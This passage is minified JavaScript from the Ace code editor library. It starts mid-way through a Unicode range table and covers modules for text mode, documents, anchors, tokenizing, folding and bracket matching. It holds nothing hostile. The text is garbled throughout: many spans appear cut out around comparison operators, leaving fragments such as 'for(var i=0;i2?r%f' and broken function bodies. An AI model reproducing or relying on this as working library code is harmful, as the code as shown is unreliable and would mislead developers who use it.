CA0ACE0ACF0AD1-0ADF0AE40AE50AF00AF2-0B000B040B0D0B0E0B110B120B290B310B340B3A0B3B0B450B460B490B4A0B4E-0B550B58-0B5B0B5E0B640B650B72-0B810B840B8B-0B8D0B910B96-0B980B9B0B9D0BA0-0BA20BA5-0BA70BAB-0BAD0BBA-0BBD0BC3-0BC50BC90BCE0BCF0BD1-0BD60BD8-0BE50BFB-0C000C040C0D0C110C290C340C3A-0C3C0C450C490C4E-0C540C570C5A-0C5F0C640C650C70-0C770C800C810C840C8D0C910CA90CB40CBA0CBB0CC50CC90CCE-0CD40CD7-0CDD0CDF0CE40CE50CF00CF3-0D010D040D0D0D110D290D3A-0D3C0D450D490D4E-0D560D58-0D5F0D640D650D76-0D780D800D810D840D97-0D990DB20DBC0DBE0DBF0DC7-0DC90DCB-0DCE0DD50DD70DE0-0DF10DF5-0E000E3B-0E3E0E5C-0E800E830E850E860E890E8B0E8C0E8E-0E930E980EA00EA40EA60EA80EA90EAC0EBA0EBE0EBF0EC50EC70ECE0ECF0EDA0EDB0EDE-0EFF0F480F6D-0F700F8C-0F8F0F980FBD0FCD0FD9-0FFF10C6-10CF10FD-10FF1249124E124F12571259125E125F1289128E128F12B112B612B712BF12C112C612C712D7131113161317135B-135E137D-137F139A-139F13F5-13FF169D-169F16F1-16FF170D1715-171F1737-173F1754-175F176D17711774-177F17DE17DF17EA-17EF17FA-17FF180F181A-181F1878-187F18AB-18AF18F6-18FF191D-191F192C-192F193C-193F1941-1943196E196F1975-197F19AC-19AF19CA-19CF19DB-19DD1A1C1A1D1A5F1A7D1A7E1A8A-1A8F1A9A-1A9F1AAE-1AFF1B4C-1B4F1B7D-1B7F1BAB-1BAD1BBA-1BFF1C38-1C3A1C4A-1C4C1C80-1CCF1CF3-1CFF1DE7-1DFC1F161F171F1E1F1F1F461F471F4E1F4F1F581F5A1F5C1F5E1F7E1F7F1FB51FC51FD41FD51FDC1FF01FF11FF51FFF2065-206920722073208F2095-209F20B9-20CF20F1-20FF218A-218F23E9-23FF2427-243F244B-245F26CE26E226E4-26E727002705270A270B2728274C274E2753-2755275F27602795-279727B027BF27CB27CD-27CF2B4D-2B4F2B5A-2BFF2C2F2C5F2CF2-2CF82D26-2D2F2D66-2D6E2D70-2D7F2D97-2D9F2DA72DAF2DB72DBF2DC72DCF2DD72DDF2E32-2E7F2E9A2EF4-2EFF2FD6-2FEF2FFC-2FFF3040309730983100-3104312E-3130318F31B8-31BF31E4-31EF321F32FF4DB6-4DBF9FCC-9FFFA48D-A48FA4C7-A4CFA62C-A63FA660A661A674-A67BA698-A69FA6F8-A6FFA78D-A7FAA82C-A82FA83A-A83FA878-A87FA8C5-A8CDA8DA-A8DFA8FC-A8FFA954-A95EA97D-A97FA9CEA9DA-A9DDA9E0-A9FFAA37-AA3FAA4EAA4FAA5AAA5BAA7C-AA7FAAC3-AADAAAE0-ABBFABEEABEFABFA-ABFFD7A4-D7AFD7C7-D7CAD7FC-D7FFFA2EFA2FFA6EFA6FFADA-FAFFFB07-FB12FB18-FB1CFB37FB3DFB3FFB42FB45FBB2-FBD2FD40-FD4FFD90FD91FDC8-FDEFFDFEFDFFFE1A-FE1FFE27-FE2FFE53FE67FE6C-FE6FFE75FEFDFEFEFF00FFBF-FFC1FFC8FFC9FFD0FFD1FFD8FFD9FFDD-FFDFFFE7FFEF-FFF8FFFEFFFF"})}),ace.define("ace/mode/text",["require","exports","module","ace/tokenizer","ace/mode/text_highlight_rules","ace/mode/behaviour/cstyle","ace/unicode","ace/lib/lang","ace/token_iterator","ace/range"],function(e,t,n){"use strict";var r=e("../tokenizer").Tokenizer,i=e("./text_highlight_rules").TextHighlightRules,s=e("./behaviour/cstyle").CstyleBehaviour,o=e("../unicode"),u=e("../lib/lang"),a=e("../token_iterator").TokenIterator,f=e("../range").Range,l=function(){this.HighlightRules=i};(function(){this.$defaultBehaviour=new s,this.tokenRe=new RegExp("^["+o.packages.L+o.packages.Mn+o.packages.Mc+o.packages.Nd+o.packages.Pc+"\\$_]+","g"),this.nonTokenRe=new RegExp("^(?:[^"+o.packages.L+o.packages.Mn+o.packages.Mc+o.packages.Nd+o.packages.Pc+"\\$_]|\\s])+","g"),this.getTokenizer=function(){return this.$tokenizer||(this.$highlightRules=this.$highlightRules||new this.HighlightRules(this.$highlightRuleConfig),this.$tokenizer=new r(this.$highlightRules.getRules())),this.$tokenizer},this.lineCommentStart="",this.blockComment="",this.toggleCommentLines=function(e,t,n,r){function w(e){for(var t=n;t<=r;t++)e(i.getLine(t),t)}var i=t.doc,s=!0,o=!0,a=Infinity,f=t.getTabSize(),l=!1;if(!this.lineCommentStart){if(!this.blockComment)return!1;var c=this.blockComment.start,h=this.blockComment.end,p=new RegExp("^(\\s*)(?:"+u.escapeRegExp(c)+")"),d=new RegExp("(?:"+u.escapeRegExp(h)+")\\s*$"),v=function(e,t){if(g(e,t))return;if(!s||/\S/.test(e))i.insertInLine({row:t,column:e.length},h),i.insertInLine({row:t,column:a},c)},m=function(e,t){var n;(n=e.match(d))&&i.removeInLine(t,e.length-n[0].length,e.length),(n=e.match(p))&&i.removeInLine(t,n[1].length,n[0].length)},g=function(e,n){if(p.test(e))return!0;var r=t.getTokens(n);for(var i=0;i2?r%f!=f-1:r%f==0}}var E=Infinity;w(function(e,t){var n=e.search(/\S/);n!==-1?(ne.length&&(E=e.length)}),a==Infinity&&(a=E,s=!1,o=!1),l&&a%f!=0&&(a=Math.floor(a/f)*f),w(o?m:v)},this.toggleBlockComment=function(e,t,n,r){var i=this.blockComment;if(!i)return;!i.start&&i[0]&&(i=i[0]);var s=new a(t,r.row,r.column),o=s.getCurrentToken(),u=t.selection,l=t.selection.toOrientedRange(),c,h;if(o&&/comment/.test(o.type)){var p,d;while(o&&/comment/.test(o.type)){var v=o.value.indexOf(i.start);if(v!=-1){var m=s.getCurrentTokenRow(),g=s.getCurrentTokenColumn()+v;p=new f(m,g,m,g+i.start.length);break}o=s.stepBackward()}var s=new a(t,r.row,r.column),o=s.getCurrentToken();while(o&&/comment/.test(o.type)){var v=o.value.indexOf(i.end);if(v!=-1){var m=s.getCurrentTokenRow(),g=s.getCurrentTokenColumn()+v;d=new f(m,g,m,g+i.end.length);break}o=s.stepForward()}d&&t.remove(d),p&&(t.remove(p),c=p.start.row,h=-i.start.length)}else h=i.start.length,c=n.start.row,t.insert(n.end,i.end),t.insert(n.start,i.start);l.start.row==c&&(l.start.column+=h),l.end.row==c&&(l.end.column+=h),t.selection.fromOrientedRange(l)},this.getNextLineIndent=function(e,t,n){return this.$getIndent(t)},this.checkOutdent=function(e,t,n){return!1},this.autoOutdent=function(e,t,n){},this.$getIndent=function(e){return e.match(/^\s*/)[0]},this.createWorker=function(e){return null},this.createModeDelegates=function(e){this.$embeds=[],this.$modes={};for(var t in e)e[t]&&(this.$embeds.push(t),this.$modes[t]=new e[t]);var n=["toggleBlockComment","toggleCommentLines","getNextLineIndent","checkOutdent","autoOutdent","transformAction","getCompletions"];for(var t=0;t=0&&t.row=0&&t.column<=e[t.row].length}function s(e,t){t.action!="insert"&&t.action!="remove"&&r(t,"delta.action must be 'insert' or 'remove'"),t.lines instanceof Array||r(t,"delta.lines must be an Array"),(!t.start||!t.end)&&r(t,"delta.start/end must be an present");var n=t.start;i(e,t.start)||r(t,"delta.start must be contained in document");var s=t.end;t.action=="remove"&&!i(e,s)&&r(t,"delta.end must contained in document for 'remove' actions");var o=s.row-n.row,u=s.column-(o==0?n.column:0);(o!=t.lines.length-1||t.lines[o].length!=u)&&r(t,"delta.range must match delta lines")}t.applyDelta=function(e,t,n){var r=t.start.row,i=t.start.column,s=e[r]||"";switch(t.action){case"insert":var o=t.lines;if(o.length===1)e[r]=s.substring(0,i)+t.lines[0]+s.substring(i);else{var u=[r,1].concat(t.lines);e.splice.apply(e,u),e[r]=s.substring(0,i)+e[r],e[r+t.lines.length-1]+=s.substring(i)}break;case"remove":var a=t.end.column,f=t.end.row;r===f?e[r]=s.substring(0,i)+s.substring(a):e.splice(r,f-r+1,s.substring(0,i)+e[f].substring(a))}}}),ace.define("ace/anchor",["require","exports","module","ace/lib/oop","ace/lib/event_emitter"],function(e,t,n){"use strict";var r=e("./lib/oop"),i=e("./lib/event_emitter").EventEmitter,s=t.Anchor=function(e,t,n){this.$onChange=this.onChange.bind(this),this.attach(e),typeof n=="undefined"?this.setPosition(t.row,t.column):this.setPosition(t,n)};(function(){function e(e,t,n){var r=n?e.column<=t.column:e.columnthis.row)return;var n=t(e,{row:this.row,column:this.column},this.$insertRight);this.setPosition(n.row,n.column,!0)},this.setPosition=function(e,t,n){var r;n?r={row:e,column:t}:r=this.$clipPositionToDocument(e,t);if(this.row==r.row&&this.column==r.column)return;var i={row:this.row,column:this.column};this.row=r.row,this.column=r.column,this._signal("change",{old:i,value:r})},this.detach=function(){this.document.removeEventListener("change",this.$onChange)},this.attach=function(e){this.document=e||this.document,this.document.on("change",this.$onChange)},this.$clipPositionToDocument=function(e,t){var n={};return e>=this.document.getLength()?(n.row=Math.max(0,this.document.getLength()-1),n.column=this.document.getLine(n.row).length):e<0?(n.row=0,n.column=0):(n.row=e,n.column=Math.min(this.document.getLine(n.row).length,Math.max(0,t))),t<0&&(n.column=0),n}}).call(s.prototype)}),ace.define("ace/document",["require","exports","module","ace/lib/oop","ace/apply_delta","ace/lib/event_emitter","ace/range","ace/anchor"],function(e,t,n){"use strict";var r=e("./lib/oop"),i=e("./apply_delta").applyDelta,s=e("./lib/event_emitter").EventEmitter,o=e("./range").Range,u=e("./anchor").Anchor,a=function(e){this.$lines=[""],e.length===0?this.$lines=[""]:Array.isArray(e)?this.insertMergedLines({row:0,column:0},e):this.insert({row:0,column:0},e)};(function(){r.implement(this,s),this.setValue=function(e){var t=this.getLength()-1;this.remove(new o(0,0,t,this.getLine(t).length)),this.insert({row:0,column:0},e)},this.getValue=function(){return this.getAllLines().join(this.getNewLineCharacter())},this.createAnchor=function(e,t){return new u(this,e,t)},"aaa".split(/a/).length===0?this.$split=function(e){return e.replace(/\r\n|\r/g,"\n").split("\n")}:this.$split=function(e){return e.split(/\r\n|\r|\n/)},this.$detectNewLine=function(e){var t=e.match(/^.*?(\r\n|\r|\n)/m);this.$autoNewLine=t?t[1]:"\n",this._signal("changeNewLineMode")},this.getNewLineCharacter=function(){switch(this.$newLineMode){case"windows":return"\r\n";case"unix":return"\n";default:return this.$autoNewLine||"\n"}},this.$autoNewLine="",this.$newLineMode="auto",this.setNewLineMode=function(e){if(this.$newLineMode===e)return;this.$newLineMode=e,this._signal("changeNewLineMode")},this.getNewLineMode=function(){return this.$newLineMode},this.isNewLine=function(e){return e=="\r\n"||e=="\r"||e=="\n"},this.getLine=function(e){return this.$lines[e]||""},this.getLines=function(e,t){return this.$lines.slice(e,t+1)},this.getAllLines=function(){return this.getLines(0,this.getLength())},this.getLength=function(){return this.$lines.length},this.getTextRange=function(e){return this.getLinesForRange(e).join(this.getNewLineCharacter())},this.getLinesForRange=function(e){var t;if(e.start.row===e.end.row)t=[this.getLine(e.start.row).substring(e.start.column,e.end.column)];else{t=this.getLines(e.start.row,e.end.row),t[0]=(t[0]||"").substring(e.start.column);var n=t.length-1;e.end.row-e.start.row==n&&(t[n]=t[n].substring(0,e.end.column))}return t},this.insertLines=function(e,t){return console.warn("Use of document.insertLines is deprecated. Use the insertFullLines method instead."),this.insertFullLines(e,t)},this.removeLines=function(e,t){return console.warn("Use of document.removeLines is deprecated. Use the removeFullLines method instead."),this.removeFullLines(e,t)},this.insertNewLine=function(e){return console.warn("Use of document.insertNewLine is deprecated. Use insertMergedLines(position, ['', '']) instead."),this.insertMergedLines(e,["",""])},this.insert=function(e,t){return this.getLength()<=1&&this.$detectNewLine(t),this.insertMergedLines(e,this.$split(t))},this.insertInLine=function(e,t){var n=this.clippedPos(e.row,e.column),r=this.pos(e.row,e.column+t.length);return this.applyDelta({start:n,end:r,action:"insert",lines:[t]},!0),this.clonePos(r)},this.clippedPos=function(e,t){var n=this.getLength();e===undefined?e=n:e<0?e=0:e>=n&&(e=n-1,t=undefined);var r=this.getLine(e);return t==undefined&&(t=r.length),t=Math.min(Math.max(t,0),r.length),{row:e,column:t}},this.clonePos=function(e){return{row:e.row,column:e.column}},this.pos=function(e,t){return{row:e,column:t}},this.$clipPosition=function(e){var t=this.getLength();return e.row>=t?(e.row=Math.max(0,t-1),e.column=this.getLine(t-1).length):(e.row=Math.max(0,e.row),e.column=Math.min(Math.max(e.column,0),this.getLine(e.row).length)),e},this.insertFullLines=function(e,t){e=Math.min(Math.max(e,0),this.getLength());var n=0;e0,r=t=0&&this.applyDelta({start:this.pos(e,this.getLine(e).length),end:this.pos(e+1,0),action:"remove",lines:["",""]})},this.replace=function(e,t){e instanceof o||(e=o.fromPoints(e.start,e.end));if(t.length===0&&e.isEmpty())return e.start;if(t==this.getTextRange(e))return e.end;this.remove(e);var n;return t?n=this.insert(e.start,t):n=e.start,n},this.applyDeltas=function(e){for(var t=0;t=0;t--)this.revertDelta(e[t])},this.applyDelta=function(e,t){var n=e.action=="insert";if(n?e.lines.length<=1&&!e.lines[0]:!o.comparePoints(e.start,e.end))return;n&&e.lines.length>2e4&&this.$splitAndapplyLargeDelta(e,2e4),i(this.$lines,e,t),this._signal("change",e)},this.$splitAndapplyLargeDelta=function(e,t){var n=e.lines,r=n.length,i=e.start.row,s=e.start.column,o=0,u=0;do{o=u,u+=t-1;var a=n.slice(o,u);if(u>r){e.lines=a,e.start.row=i+o,e.start.column=s;break}a.push(""),this.applyDelta({start:this.pos(i+o,s),end:this.pos(i+u,s=0),action:e.action,lines:a},!0)}while(!0)},this.revertDelta=function(e){this.applyDelta({start:this.clonePos(e.start),end:this.clonePos(e.end),action:e.action=="insert"?"remove":"insert",lines:e.lines.slice()})},this.indexToPosition=function(e,t){var n=this.$lines||this.getAllLines(),r=this.getNewLineCharacter().length;for(var i=t||0,s=n.length;i20){n.running=setTimeout(n.$worker,20);break}}n.currentLine=t,s<=r&&n.fireUpdateEvent(s,r)}};(function(){r.implement(this,i),this.setTokenizer=function(e){this.tokenizer=e,this.lines=[],this.states=[],this.start(0)},this.setDocument=function(e){this.doc=e,this.lines=[],this.states=[],this.stop()},this.fireUpdateEvent=function(e,t){var n={first:e,last:t};this._signal("update",{data:n})},this.start=function(e){this.currentLine=Math.min(e||0,this.currentLine,this.doc.getLength()),this.lines.splice(this.currentLine,this.lines.length),this.states.splice(this.currentLine,this.states.length),this.stop(),this.running=setTimeout(this.$worker,700)},this.scheduleStart=function(){this.running||(this.running=setTimeout(this.$worker,700))},this.$updateOnChange=function(e){var t=e.start.row,n=e.end.row-t;if(n===0)this.lines[t]=null;else if(e.action=="remove")this.lines.splice(t,n+1,null),this.states.splice(t,n+1,null);else{var r=Array(n+1);r.unshift(t,1),this.lines.splice.apply(this.lines,r),this.states.splice.apply(this.states,r)}this.currentLine=Math.min(t,this.currentLine,this.doc.getLength()),this.stop()},this.stop=function(){this.running&&clearTimeout(this.running),this.running=!1},this.getTokens=function(e){return this.lines[e]||this.$tokenizeRow(e)},this.getState=function(e){return this.currentLine==e&&this.$tokenizeRow(e),this.states[e]||"start"},this.$tokenizeRow=function(e){var t=this.doc.getLine(e),n=this.states[e-1],r=this.tokenizer.getLineTokens(t,n,e);return this.states[e]+""!=r.state+""?(this.states[e]=r.state,this.lines[e+1]=null,this.currentLine>e+1&&(this.currentLine=e+1)):this.currentLine==e&&(this.currentLine=e+1),this.lines[e]=r.tokens}}).call(s.prototype),t.BackgroundTokenizer=s}),ace.define("ace/search_highlight",["require","exports","module","ace/lib/lang","ace/lib/oop","ace/range"],function(e,t,n){"use strict";var r=e("./lib/lang"),i=e("./lib/oop"),s=e("./range").Range,o=function(e,t,n){this.setRegexp(e),this.clazz=t,this.type=n||"text"};(function(){this.MAX_RANGES=500,this.setRegexp=function(e){if(this.regExp+""==e+"")return;this.regExp=e,this.cache=[]},this.update=function(e,t,n,i){if(!this.regExp)return;var o=i.firstRow,u=i.lastRow;for(var a=o;a<=u;a++){var f=this.cache[a];f==null&&(f=r.getMatchOffsets(n.getLine(a),this.regExp),f.length>this.MAX_RANGES&&(f=f.slice(0,this.MAX_RANGES)),f=f.map(function(e){return new s(a,e.offset,a,e.offset+e.length)}),this.cache[a]=f.length?f:"");for(var l=f.length;l--;)t.drawSingleLineMarker(e,f[l].toScreenRange(n),this.clazz,i)}}}).call(o.prototype),t.SearchHighlight=o}),ace.define("ace/edit_session/fold_line",["require","exports","module","ace/range"],function(e,t,n){"use strict";function i(e,t){this.foldData=e,Array.isArray(t)?this.folds=t:t=this.folds=[t];var n=t[t.length-1];this.range=new r(t[0].start.row,t[0].start.column,n.end.row,n.end.column),this.start=this.range.start,this.end=this.range.end,this.folds.forEach(function(e){e.setFoldLine(this)},this)}var r=e("../range").Range;(function(){this.shiftRow=function(e){this.start.row+=e,this.end.row+=e,this.folds.forEach(function(t){t.start.row+=e,t.end.row+=e})},this.addFold=function(e){if(e.sameRow){if(e.start.rowthis.endRow)throw new Error("Can't add a fold to this FoldLine as it has no connection");this.folds.push(e),this.folds.sort(function(e,t){return-e.range.compareEnd(t.start.row,t.start.column)}),this.range.compareEnd(e.start.row,e.start.column)>0?(this.end.row=e.end.row,this.end.column=e.end.column):this.range.compareStart(e.end.row,e.end.column)<0&&(this.start.row=e.start.row,this.start.column=e.start.column)}else if(e.start.row==this.end.row)this.folds.push(e),this.end.row=e.end.row,this.end.column=e.end.column;else{if(e.end.row!=this.start.row)throw new Error("Trying to add fold to FoldRow that doesn't have a matching row");this.folds.unshift(e),this.start.row=e.start.row,this.start.column=e.start.column}e.foldLine=this},this.containsRow=function(e){return e>=this.start.row&&e<=this.end.row},this.walk=function(e,t,n){var r=0,i=this.folds,s,o,u,a=!0;t==null&&(t=this.end.row,n=this.end.column);for(var f=0;f0)continue;var a=i(e,o.start);return u===0?t&&a!==0?-s-2:s:a>0||a===0&&!t?s:-s-1}return-s-1},this.add=function(e){var t=!e.isEmpty(),n=this.pointIndex(e.start,t);n<0&&(n=-n-1);var r=this.pointIndex(e.end,t,n);return r<0?r=-r-1:r++,this.ranges.splice(n,r-n,e)},this.addList=function(e){var t=[];for(var n=e.length;n--;)t.push.apply(t,this.add(e[n]));return t},this.substractPoint=function(e){var t=this.pointIndex(e);if(t>=0)return this.ranges.splice(t,1)},this.merge=function(){var e=[],t=this.ranges;t=t.sort(function(e,t){return i(e.start,t.start)});var n=t[0],r;for(var s=1;s=0},this.containsPoint=function(e){return this.pointIndex(e)>=0},this.rangeAtPoint=function(e){var t=this.pointIndex(e);if(t>=0)return this.ranges[t]},this.clipRows=function(e,t){var n=this.ranges;if(n[0].start.row>t||n[n.length-1].start.rowr)break;l.start.row==r&&l.start.column>=t.column&&(l.start.column!=t.column||!this.$insertRight)&&(l.start.column+=o,l.start.row+=s);if(l.end.row==r&&l.end.column>=t.column){if(l.end.column==t.column&&this.$insertRight)continue;l.end.column==t.column&&o>0&&al.start.column&&l.end.column==u[a+1].start.column&&(l.end.column-=o),l.end.column+=o,l.end.row+=s}}if(s!=0&&a=e)return i;if(i.end.row>e)return null}return null},this.getNextFoldLine=function(e,t){var n=this.$foldData,r=0;t&&(r=n.indexOf(t)),r==-1&&(r=0);for(r;r=e)return i}return null},this.getFoldedRowCount=function(e,t){var n=this.$foldData,r=t-e+1;for(var i=0;i=t){u=e?r-=t-u:r=0);break}o>=e&&(u>=e?r-=o-u:r-=o-e+1)}return r},this.$addFoldLine=function(e){return this.$foldData.push(e),this.$foldData.sort(function(e,t){return e.start.row-t.start.row}),e},this.addFold=function(e,t){var n=this.$foldData,r=!1,o;e instanceof s?o=e:(o=new s(t,e),o.collapseChildren=t.collapseChildren),this.$clipRangeToDocument(o.range);var u=o.start.row,a=o.start.column,f=o.end.row,l=o.end.column;if(u0&&(this.removeFolds(p),p.forEach(function(e){o.addSubFold(e)}));for(var d=0;d0&&this.foldAll(e.start.row+1,e.end.row,e.collapseChildren-1),e.subFolds=[]},this.expandFolds=function(e){e.forEach(function(e){this.expandFold(e)},this)},this.unfold=function(e,t){var n,i;e==null?(n=new r(0,0,this.getLength(),0),t=!0):typeof e=="number"?n=new r(e,0,e,this.getLine(e).length):"row"in e?n=r.fromPoints(e,e):n=e,i=this.getFoldsInRangeList(n);if(t)this.removeFolds(i);else{var s=i;while(s.length)this.expandFolds(s),s=this.getFoldsInRangeList(n)}if(i.length)return i},this.isRowFolded=function(e,t){return!!this.getFoldLine(e,t)},this.getRowFoldEnd=function(e,t){var n=this.getFoldLine(e,t);return n?n.end.row:e},this.getRowFoldStart=function(e,t){var n=this.getFoldLine(e,t);return n?n.start.row:e},this.getFoldDisplayLine=function(e,t,n,r,i){r==null&&(r=e.start.row),i==null&&(i=0),t==null&&(t=e.end.row),n==null&&(n=this.getLine(t).length);var s=this.doc,o="";return e.walk(function(e,t,n,u){if(t=e){i=s.end.row;try{var o=this.addFold("...",s);o&&(o.collapseChildren=n)}catch(u){}}}},this.$foldStyles={manual:1,markbegin:1,markbeginend:1},this.$foldStyle="markbegin",this.setFoldStyle=function(e){if(!this.$foldStyles[e])throw new Error("invalid fold style: "+e+"["+Object.keys(this.$foldStyles).join(", ")+"]");if(this.$foldStyle==e)return;this.$foldStyle=e,e=="manual"&&this.unfold();var t=this.$foldMode;this.$setFolding(null),this.$setFolding(t)},this.$setFolding=function(e){if(this.$foldMode==e)return;this.$foldMode=e,this.off("change",this.$updateFoldWidgets),this.off("tokenizerUpdate",this.$tokenizerUpdateFoldWidgets),this._signal("changeAnnotation");if(!e||this.$foldStyle=="manual"){this.foldWidgets=null;return}this.foldWidgets=[],this.getFoldWidget=e.getFoldWidget.bind(e,this,this.$foldStyle),this.getFoldWidgetRange=e.getFoldWidgetRange.bind(e,this,this.$foldStyle),this.$updateFoldWidgets=this.updateFoldWidgets.bind(this),this.$tokenizerUpdateFoldWidgets=this.tokenizerUpdateFoldWidgets.bind(this),this.on("change",this.$updateFoldWidgets),this.on("tokenizerUpdate",this.$tokenizerUpdateFoldWidgets)},this.getParentFoldRangeData=function(e,t){var n=this.foldWidgets;if(!n||t&&n[e])return{};var r=e-1,i;while(r>=0){var s=n[r];s==null&&(s=n[r]=this.getFoldWidget(r));if(s=="start"){var o=this.getFoldWidgetRange(r);i||(i=o);if(o&&o.end.row>=e)break}r--}return{range:r!==-1&&o,firstRange:i}},this.onFoldWidgetClick=function(e,t){t=t.domEvent;var n={children:t.shiftKey,all:t.ctrlKey||t.metaKey,siblings:t.altKey},r=this.$toggleFoldWidget(e,n);if(!r){var i=t.target||t.srcElement;i&&/ace_fold-widget/.test(i.className)&&(i.className+=" ace_invalid")}},this.$toggleFoldWidget=function(e,t){if(!this.getFoldWidget)return;var n=this.getFoldWidget(e),r=this.getLine(e),i=n==="end"?-1:1,s=this.getFoldAt(e,i===-1?0:r.length,i);if(s)return t.children||t.all?this.removeFold(s):this.expandFold(s),s;var o=this.getFoldWidgetRange(e,!0);if(o&&!o.isMultiLine()){s=this.getFoldAt(o.start.row,o.start.column,1);if(s&&o.isEqual(s.range))return this.removeFold(s),s}if(t.siblings){var u=this.getParentFoldRangeData(e);if(u.range)var a=u.range.start.row+1,f=u.range.end.row;this.foldAll(a,f,t.all?1e4:0)}else t.children?(f=o?o.end.row:this.getLength(),this.foldAll(e+1,f,t.all?1e4:0)):o&&(t.all&&(o.collapseChildren=1e4),this.addFold("...",o));return o},this.toggleFoldWidget=function(e){var t=this.selection.getCursor().row;t=this.getRowFoldStart(t);var n=this.$toggleFoldWidget(t,{});if(n)return;var r=this.getParentFoldRangeData(t,!0);n=r.range||r.firstRange;if(n){t=n.start.row;var i=this.getFoldAt(t,this.getLine(t).length,1);i?this.removeFold(i):this.addFold("...",n)}},this.updateFoldWidgets=function(e){var t=e.start.row,n=e.end.row-t;if(n===0)this.foldWidgets[t]=null;else if(e.action=="remove")this.foldWidgets.splice(t,n+1,null);else{var r=Array(n+1);r.unshift(t,1),this.foldWidgets.splice.apply(this.foldWidgets,r)}},this.tokenizerUpdateFoldWidgets=function(e){var t=e.data;t.first!=t.last&&this.foldWidgets.length>t.first&&this.foldWidgets.splice(t.first,this.foldWidgets.length)}}var r=e("../range").Range,i=e("./fold_line").FoldLine,s=e("./fold").Fold,o=e("../token_iterator").TokenIterator;t.Folding=u}),ace.define("ace/edit_session/bracket_match",["require","exports","module","ace/token_iterator","ace/range"],function(e,t,n){"use strict";function s(){this.findMatchingBracket=function(e,t){if(e.column==0)return null;var n=t||this.getLine(e.row).charAt(e.column-1);if(n=="")return null;var r=n.match(/([\(\[\{])|([\)\]\}])/);return r?r[1]?this.$findClosingBracket(r[1],e):this.$findOpeningBracket(r[2],e):null},this.getBracketRange=function(e){var t=this.getLine(e.row),n=!0,r,s=t.charAt(e.column-1),o=s&&s.match(/([\(\[\{])|([\)\]\}])/);o||(s=t.charAt(e.column),e={row:e.row,column:e.column+1},o=s&&s.match(/([\(\[\{])|([\)\]\}])/),n=!1);if(!o)return null;if(o[1]){var u=this.$findClosingBracket(o[1],e);if(!u)return null;r=i.fromPoints(e,u),n||(r.end.column++,r.start.column--),r.cursor=r.end}else{var u=this.$findOpeningBracket(o[2],e);if(!u)return null;r=i.fromPoints(u,e),n||(r.start.column++,r.end.column--),r.cursor=r.start}return r},this.$brackets={")":"(","(":")","]":"[","[":"]","{":"}","}":"{"},this.$findOpeningBracket=function(e,t,n){var i=this.$brackets[e],s=1,o=new r(this,t.row,t.column),u=o.getCurrentToken();u||(u=o.stepForward());if(!u)return;n||(n=new RegExp("(\\.?"+u.type.replace(".","\\.").replace("rparen",".paren").replace(/\b(?:end)\b/,"(?:start|begin|end)")+")+"));var a=t.column-o.getCurrentTokenColumn()-2,f=u.value;for(;;){while(a>=0){var l=f.charAt(a);if(l==i){s-=1;if(s==0)return{row:o.getCurrentTokenRow(),column:a+o.getCurrentTokenColumn()}}else l==e&&(s+=1);a-=1}do u=o.stepBackward();while(u&&!n.test(u.type));if(u==null)break;f=u.value,a=f.length-1}return null},this.$findClosingBracket=function(e,t,n){var i=this.$brackets[e],s=1,o=new r(this,t.row,t.column),u=o.getCurrentToken();u||(u=o.stepForward());if(!u)return;n||(n=new RegExp("(\\.?"+u.type.replace(".","\\.").replace("lparen",".paren").replace(/\b(?:start|begin)\b/,"(?:start|begin|end)")+")+"));var a=t.column-o.getCurrentTokenColumn();for(;;){var f=u.value,l=f.length;while(a=4352&&e<=4447||e>=4515&&e<=4519||e>=4602&&e<=4607||e>=9001&&e<=9002||e>=11904&&e<=11929||e>=11931&&e<=12019||e>=12032&&e<=12245||e>=12272&&e<=12283||e>=12288&&e<=12350||e>=12353&&e<=12438||e>=12441&&e<=12543||e>=12549&&e<=12589||e>=12593&&e<=12686||e>=12688&&e<=12730||e>=12736&&e<=12771||e>=12784&&e<=12830||e>=12832&&e<=12871||e>=12880&&e<=13054||e>=13056&&e<=19903||e>=19968&&e<=42124||e>=42128&&e<=42182||e>=43360&&e<=43388||e>=44032&&e<=55203||e>=55216&&e<=55238||e>=55243&&e<=55291||e>=63744&&e<=64255||e>=65040&&e<=65049||e>=65072&&e<=65106||e>=65108&&e<=65126||e>=65128&&e<=65131||e>=65281&&e<=65376||e>=65504&&e<=65510}r.implement(this,o),this.setDocument=function(e){this.doc&&this.doc.removeListener("change",this.$onChange),this.doc=e,e.on("change",this.$onChange),this.bgTokenizer&&this.bgTokenizer.setDocument(this.getDocument()),this.resetCaches()},this.getDocument=function(){return this.doc},this.$resetRowCache=function(e){if(!e){this.$docRowCache=[],this.$screenRowCache=[];return}var t=this.$docRowCache.length,n=this.$getRowCacheIndex(this.$docRowCache,e)+1;t>n&&(this.$docRowCache.splice(n,t),this.$screenRowCache.splice(n,t))},this.$getRowCacheIndex=function(e,t){var n=0,r=e.length-1;while(n<=r){var i=n+r>>1,s=e[i];if(t>s)n=i+1;else{if(!(t=t)break}return r=n[s],r?(r.index=s,r.start=i-r.value.length,r):null},this.setUndoManager=function(e){this.$undoManager=e,this.$deltas=[],this.$deltasDoc=[],this.$deltasFold=[],this.$informUndoManager&&this.$informUndoManager.cancel();if(e){var t=this;this.$syncInformUndoManager=function(){t.$informUndoManager.cancel(),t.$deltasFold.length&&(t.$deltas.push({group:"fold",deltas:t.$deltasFold}),t.$deltasFold=[]),t.$deltasDoc.length&&(t.$deltas.push({group:"doc",deltas:t.$deltasDoc}),t.$deltasDoc=[]),t.$deltas.length>0&&e.execute({action:"aceupdate",args:[t.$deltas,t],merge:t.mergeUndoDeltas}),t.mergeUndoDeltas=!1,t.$deltas=[]},this.$informUndoManager=i.delayedCall(this.$syncInformUndoManager)}},this.markUndoGroup=function(){this.$syncInformUndoManager&&this.$syncInformUndoManager()},this.$defaultUndoManager={undo:function(){},redo:function(){},reset:function(){}},this.getUndoManager=function(){return this.$undoManager||this.$defaultUndoManager},this.getTabString=function(){return this.getUseSoftTabs()?i.stringRepeat(" ",this.getTabSize()):" "},this.setUseSoftTabs=function(e){this.setOption("useSoftTabs",e)},this.getUseSoftTabs=function(){return this.$useSoftTabs&&!this.$mode.$indentWithTabs},this.setTabSize=function(e){this.setOption("tabSize",e)},this.getTabSize=function(){return this.$tabSize},this.isTabStop=function(e){return this.$useSoftTabs&&e.column%this.$tabSize===0},this.$overwrite=!1,this.setOverwrite=function(e){this.setOption("overwrite",e)},this.getOverwrite=function(){return this.$overwrite},this.toggleOverwrite=function(){this.setOverwrite(!this.$overwrite)},this.addGutterDecoration=function(e,t){this.$decorations[e]||(this.$decorations[e]=""),this.$decorations[e]+=" "+t,this._signal("changeBreakpoint",{})},this.removeGutterDecoration=function(e,t){this.$decorations[e]=(this.$decorations[e]||"").replace(" 